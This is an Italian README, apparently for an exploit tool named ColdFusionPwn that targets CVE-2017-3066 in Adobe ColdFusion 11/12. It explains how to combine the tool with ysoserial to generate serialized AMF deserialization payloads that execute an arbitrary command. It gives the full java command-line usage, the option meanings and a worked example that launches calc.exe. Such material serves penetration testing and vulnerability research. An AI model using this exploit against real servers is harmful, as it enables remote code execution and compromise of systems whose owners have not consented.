
Strumento di exploit per CVE-2017-3066 che mira ad Adobe Coldfusion 11/12
Strumento di sfruttamento per CVE-2017-3066 che mira ad Adobe ColdFusion 11/12.
Lo strumento consente di generare payload AMF serializzati per sfruttare la mancata convalida dell'input delle classi consentite. Per i dettagli, vedi il nostro post del blog.
Scarica l'ultima versione di ysoserial. Scarica ColdFusionPwn dalle release.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
È necessario avere ColdFusionPwn-0.0.1-SNAPSHOT-all.jar come prima voce nel classpath, poiché la libreria ApacheCommons BeanUtils inclusa in ysoserial è più recente (e ha una serialversion uid diversa).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf